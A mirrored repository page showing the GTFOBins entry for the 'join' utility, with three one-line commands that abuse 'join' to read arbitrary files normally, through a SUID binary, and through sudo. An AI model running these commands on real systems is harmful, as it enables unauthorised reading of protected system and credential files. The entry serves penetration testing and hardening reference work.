This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2025-12-28 03:01:42 +01:00
Code
Issues
08dfd05aee
GTFOBins.github.io
/
_gtfobins
/
join.md
巴都万
2eb95ad20d
Fix join
2022-12-16 15:12:26 +01:00
283 B
Raw
Blame
History
functions
file-read
suid
sudo
code
LFILE=file_to_read join -a 2 /dev/null $LFILE
code
LFILE=file_to_read ./join -a 2 /dev/null $LFILE
code
LFILE=file_to_read sudo join -a 2 /dev/null $LFILE